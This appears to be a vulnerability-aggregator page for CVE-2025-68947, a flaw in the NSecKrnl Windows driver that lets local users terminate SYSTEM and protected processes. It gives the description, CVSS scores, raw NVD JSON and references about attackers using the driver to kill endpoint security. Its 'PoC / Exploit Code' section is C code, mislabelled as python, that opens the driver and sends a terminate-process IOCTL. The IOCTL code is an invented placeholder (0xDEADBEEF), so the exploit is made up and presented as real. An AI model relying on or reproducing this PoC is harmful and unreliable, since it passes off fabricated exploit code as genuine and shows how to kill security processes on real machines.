Security Vulnerability Report
中文
CVE-2025-68947 CVSS 4.7 MEDIUM

CVE-2025-68947

Published: 2026-01-13 22:16:06
Last Modified: 2026-04-15 00:35:42
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

NSecsoft 'NSecKrnl' is a Windows driver that allows a local, authenticated attacker to terminate processes owned by other users, including SYSTEM and Protected Processes by issuing crafted IOCTL requests to the driver.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

NSecKrnl 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68947 PoC - NSecKrnl Driver Process Termination // Compile: gcc -o nseckrnl_poc nseckrnl_poc.c #include <windows.h> #include <stdio.h> #include <tlhelp32.h> #define IOCTL_TERMINATE_PROCESS 0xDEADBEEF // Example IOCTL code int main(int argc, char* argv[]) { HANDLE hDevice; DWORD bytesReturned; DWORD targetPid; BOOL result; // Open handle to NSecKrnl driver device hDevice = CreateFile( "\\\\.\\NSecKrnl", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open NSecKrnl driver. Error: %d\n", GetLastError()); return 1; } printf("[+] Successfully opened handle to NSecKrnl driver\n"); if (argc > 1) { targetPid = atoi(argv[1]); } else { printf("Usage: %s <target_pid>\n", argv[0]); CloseHandle(hDevice); return 1; } printf("[*] Attempting to terminate process with PID: %u\n", targetPid); // Send IOCTL request to terminate target process result = DeviceIoControl( hDevice, IOCTL_TERMINATE_PROCESS, &targetPid, sizeof(DWORD), NULL, 0, &bytesReturned, NULL ); if (result) { printf("[+] Process %u terminated successfully!\n", targetPid); } else { printf("[-] Failed to terminate process. Error: %d\n", GetLastError()); } CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68947", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2026-01-13T22:16:06.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NSecsoft 'NSecKrnl' is a Windows driver that allows a local, authenticated attacker to terminate processes owned by other users, including SYSTEM and Protected Processes by issuing crafted IOCTL requests to the driver."}, {"lang": "es", "value": "NSecsoft 'NSecKrnl' es un controlador de Windows que permite a un atacante local y autenticado terminar procesos propiedad de otros usuarios, incluyendo SYSTEM y Procesos Protegidos, mediante la emisión de solicitudes IOCTL manipuladas al controlador."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/ANYLNK/NSecSoftBYOVD", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://hexastrike.com/resources/blog/threat-intelligence/valleyrat-exploiting-byovd-to-kill-endpoint-security/", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-013-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-68947", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://www.virustotal.com/gui/file/206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.